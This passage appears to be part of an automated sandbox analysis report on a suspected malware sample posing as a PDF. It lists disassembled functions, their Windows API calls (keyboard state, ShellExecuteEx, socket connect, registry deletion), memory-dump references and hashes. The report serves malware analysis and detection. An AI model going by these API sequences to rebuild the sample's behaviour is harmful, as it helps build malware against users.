                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 774024439-3081909835
                                                                          • Opcode ID: 37d85a987e587bfd36304642ab12f77dce9fb2be7c1258de634358485e9f6574
                                                                          • Instruction ID: c64c4c1d402c1bfd2fd6839d55eced33c96d3471f52c503d5668e86a9cfed71d
                                                                          • Opcode Fuzzy Hash: 37d85a987e587bfd36304642ab12f77dce9fb2be7c1258de634358485e9f6574
                                                                          • Instruction Fuzzy Hash: 55C17B715083419FD724EF24C985A6EB7E4FF88310F1049ADF8999B2A2DB70ED45CB82
                                                                          Function 00AE1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ec32e2ec659b025cd0e6c103b7b07606bdb39cff1228bbcc27eecd452bf70db
                                                                          • Instruction ID: 74d3c84e170d53a2e840df74c7c7364a1e15dabcda345925fd05194067883048
                                                                          • Opcode Fuzzy Hash: 7ec32e2ec659b025cd0e6c103b7b07606bdb39cff1228bbcc27eecd452bf70db
                                                                          • Instruction Fuzzy Hash: BF716970900159EFCB148F99CC89EBEBBB9FF89310F148159F915AB291D734AA51CFA0
                                                                          Function 00B56E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 585c3d81a8063e01f7243685a48714a1149848b2e81b0e83121401786918af5b
                                                                          • Instruction ID: ebd1484ed5da5cb40343e99a7b05ce0f1dec48091bce09b18bf399027e72ffc0
                                                                          • Opcode Fuzzy Hash: 585c3d81a8063e01f7243685a48714a1149848b2e81b0e83121401786918af5b
                                                                          • Instruction Fuzzy Hash: 6361BA71608340ABC710EB25DC86F6FB7E9EF88714F144999F9459B2E2DA709D08C792
                                                                          Function 00B6B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindow.USER32(01070FB8), ref: 00B6B6A5
                                                                          • IsWindowEnabled.USER32(01070FB8), ref: 00B6B6B1
                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B6B795
                                                                          • SendMessageW.USER32(01070FB8,000000B0,?,?), ref: 00B6B7CC
                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00B6B809
                                                                          • GetWindowLongW.USER32(01070FB8,000000EC), ref: 00B6B82B
                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B6B843
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                          • String ID:
                                                                          • API String ID: 4072528602-0
                                                                          • Opcode ID: 5d5dfc1d3b2baed060dfeba37f70ea664126e816c7cc006547d2372adbabd8e8
                                                                          • Instruction ID: 3a090f7071b38ea1a19f8882e8906ef7fb410a39e336c18c535002f474c6298b
                                                                          • Opcode Fuzzy Hash: 5d5dfc1d3b2baed060dfeba37f70ea664126e816c7cc006547d2372adbabd8e8
                                                                          • Instruction Fuzzy Hash: E6717C74604205AFDB249F64C8D4FBABBF9FF4A300F1440A9E956D72A1CB39AD91CB50
                                                                          Function 00B5F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B5F75C
                                                                          • _memset.LIBCMT ref: 00B5F825
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00B5F86A
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                          • GetProcessId.KERNEL32(00000000), ref: 00B5F8E1
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B5F910
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                          • String ID: @
                                                                          • API String ID: 3522835683-2766056989
                                                                          • Opcode ID: c384d8d2cc1f471da6610d7e67ff53714e11c72347cac6593b05835ea7781f0f
                                                                          • Instruction ID: 00cccd5b320adad02f39f42d33ea048757b9627ecfc4f51b5a8de224115e64ee
                                                                          • Opcode Fuzzy Hash: c384d8d2cc1f471da6610d7e67ff53714e11c72347cac6593b05835ea7781f0f
                                                                          • Instruction Fuzzy Hash: A8618C75A0065ADFCB14EF55C580AAEFBF4FF48310F1484A9E846AB391CB30AD45CB90
                                                                          Function 00B4145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00B4149C
                                                                          • GetKeyboardState.USER32(?), ref: 00B414B1
                                                                          • SetKeyboardState.USER32(?), ref: 00B41512
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B41540
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B4155F
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B415A5
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B415C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 3c4fb671307f34ab6d578f75a0260e9a6c939d9c987adb22e975152979a3aa8f
                                                                          • Instruction ID: b6db0c7f03e3bf3a46ea763867a7d18f265bcdb469fbc6045abe366d9227a506
                                                                          • Opcode Fuzzy Hash: 3c4fb671307f34ab6d578f75a0260e9a6c939d9c987adb22e975152979a3aa8f
                                                                          • Instruction Fuzzy Hash: 5E51D3A0E047D53DFB36462C8C45BBA7FE99B46304F0848C9E1D5568C2D6E8DEC4EB50
                                                                          Function 00B41276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(00000000), ref: 00B412B5
                                                                          • GetKeyboardState.USER32(?), ref: 00B412CA
                                                                          • SetKeyboardState.USER32(?), ref: 00B4132B
                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B41357
                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B41374
                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B413B8
                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B413D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: abd97e80fd4a99e877c7fd015d5d09cf44ab4cb739d2ee296a3e59c068b0dc6b
                                                                          • Instruction ID: 166c1fcec39bd0ab740ff5dc6c28b7c613628491b579e834b2672fafa4471db6
                                                                          • Opcode Fuzzy Hash: abd97e80fd4a99e877c7fd015d5d09cf44ab4cb739d2ee296a3e59c068b0dc6b
                                                                          • Instruction Fuzzy Hash: A051F6A0D047D53DFB3287288C55B7A7FE99B06300F0889C9E1D8968C2D794AED4F765
                                                                          Function 00B4589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$LocalTime
                                                                          • String ID:
                                                                          • API String ID: 2945705084-0
                                                                          • Opcode ID: c85730d6aa8e912bc5111a72e589b09996b4715440e7a3d48427a6f94a262a8a
                                                                          • Instruction ID: 5049b6ff5544a3b96dd63232aa280d548b79d7eaca5d805ac2ead1cde081951d
                                                                          • Opcode Fuzzy Hash: c85730d6aa8e912bc5111a72e589b09996b4715440e7a3d48427a6f94a262a8a
                                                                          • Instruction Fuzzy Hash: 794193A5C20618B6CB10EBB4CC8A9DFBBECAF04710F508596F518E3162E734E715C7A9
                                                                          Function 00B438AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B438D3,?), ref: 00B448C7
                                                                            • Part of subcall function 00B448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B438D3,?), ref: 00B448E0
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B438F3
                                                                          • _wcscmp.LIBCMT ref: 00B4390F
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B43927
                                                                          • _wcscat.LIBCMT ref: 00B4396F
                                                                          • SHFileOperationW.SHELL32(?), ref: 00B439DB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 1377345388-1173974218
                                                                          • Opcode ID: cd71cbde51b35e2e8298b2728fc2ca3fe62738d236786ab6af7efb4de6d3892c
                                                                          • Instruction ID: 4f117027ba41385bb31012b93cbc3936ee9758920c2bf8b5145de30dfbaca0a7
                                                                          • Opcode Fuzzy Hash: cd71cbde51b35e2e8298b2728fc2ca3fe62738d236786ab6af7efb4de6d3892c
                                                                          • Instruction Fuzzy Hash: B94181B140C3849AC751EF64D485AEFB7E8EF88740F5409AEB48AC3191EB74D788C752
                                                                          Function 00B67500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B67519
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B675C0
                                                                          • IsMenu.USER32(?), ref: 00B675D8
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B67620
                                                                          • DrawMenuBar.USER32 ref: 00B67633
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                          • String ID: 0
                                                                          • API String ID: 3866635326-4108050209
                                                                          • Opcode ID: 8aa834fbd5b01c142c1fcc40a4958b05c53dba6038d0a526e82faa3f2caf7563
                                                                          • Instruction ID: 2868849f701c46c52fa4a40c64aa126514512105be57b27cc5f456a0490c50bf
                                                                          • Opcode Fuzzy Hash: 8aa834fbd5b01c142c1fcc40a4958b05c53dba6038d0a526e82faa3f2caf7563
                                                                          • Instruction Fuzzy Hash: 9C415C75A05609EFDB10DF54D884EAABBF8FF05324F1480A9F91697290DB34AD50CF90
                                                                          Function 00B6122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B6125C
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B61286
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00B6133D
                                                                            • Part of subcall function 00B6122D: RegCloseKey.ADVAPI32(?), ref: 00B612A3
                                                                            • Part of subcall function 00B6122D: FreeLibrary.KERNEL32(?), ref: 00B612F5
                                                                            • Part of subcall function 00B6122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B61318
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B612E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: 2e234b0abd76592771b3fd795db613567819a0708e914c4a7e7671ac4c322cd3
                                                                          • Instruction ID: 174a940506da77b5b77de1fd4b0be350cceaeb4ab72a309c5216ac63f23646e7
                                                                          • Opcode Fuzzy Hash: 2e234b0abd76592771b3fd795db613567819a0708e914c4a7e7671ac4c322cd3
                                                                          • Instruction Fuzzy Hash: 25312DB1901109BFDB14DF94EC99AFEB7BCEF08340F0405A9E502E3251DA789E459AA4
                                                                          Function 00B6653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B6655B
                                                                          • GetWindowLongW.USER32(01070FB8,000000F0), ref: 00B6658E
                                                                          • GetWindowLongW.USER32(01070FB8,000000F0), ref: 00B665C3
                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B665F5
                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B6661F
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B66630
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B6664A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2178440468-0
                                                                          • Opcode ID: bf5c996bd5e91dea88062ecdd812ec76ec5e76bcf7e1b3919568fafd9e09ac8c
                                                                          • Instruction ID: 625233d9e40d5799d55361af32f983b54394b7c44aaacca0df4f733938612611
                                                                          • Opcode Fuzzy Hash: bf5c996bd5e91dea88062ecdd812ec76ec5e76bcf7e1b3919568fafd9e09ac8c
                                                                          • Instruction Fuzzy Hash: F3310F70604255AFDB208F28EC86F653BE5FB5A710F1801A9F512CB2F6CB69AC40DB91
                                                                          Function 00B56486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B564D9
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B564E8
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B56521
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00B5652A
                                                                          • WSAGetLastError.WSOCK32 ref: 00B56534
                                                                          • closesocket.WSOCK32(00000000), ref: 00B5655D
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B56576
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 910771015-0
                                                                          • Opcode ID: f5f5f7c71bd916031c1e75a62838d41572e107eed895de8641346430cff718a5
                                                                          • Instruction ID: 919b772f810201770cb7ae49cb75a5ca03c7ace89d795c258d6b796da43466c0
                                                                          • Opcode Fuzzy Hash: f5f5f7c71bd916031c1e75a62838d41572e107eed895de8641346430cff718a5
                                                                          • Instruction Fuzzy Hash: 9131AF71600218AFEB10AF24DC85BBE7BE8EF54711F4480A9FD05A7291DB74AD09CBA1
                                                                          Function 00B3E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B3E0FA
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B3E120
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00B3E123
                                                                          • SysAllocString.OLEAUT32 ref: 00B3E144
                                                                          • SysFreeString.OLEAUT32 ref: 00B3E14D
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00B3E167
                                                                          • SysAllocString.OLEAUT32(?), ref: 00B3E175
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: d9aa8728fae2443ac7cb7a41424bdf782b22edd1d7cf1278d72c90d9ff6aa0df
                                                                          • Instruction ID: 19f6bb8a822bf4101b040b884e62fc4fe7863ea87f272a3820d4dfeef9bc599f
                                                                          • Opcode Fuzzy Hash: d9aa8728fae2443ac7cb7a41424bdf782b22edd1d7cf1278d72c90d9ff6aa0df
                                                                          • Instruction Fuzzy Hash: 26219035204109AFDB10AFA8DC89CBB77ECEB09760B108166FA24DB2E0DE74DC418B60
                                                                          Function 00B6783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AE1D73
                                                                            • Part of subcall function 00AE1D35: GetStockObject.GDI32(00000011), ref: 00AE1D87
                                                                            • Part of subcall function 00AE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE1D91
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B678A1
                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B678AE
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B678B9
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B678C8
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B678D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
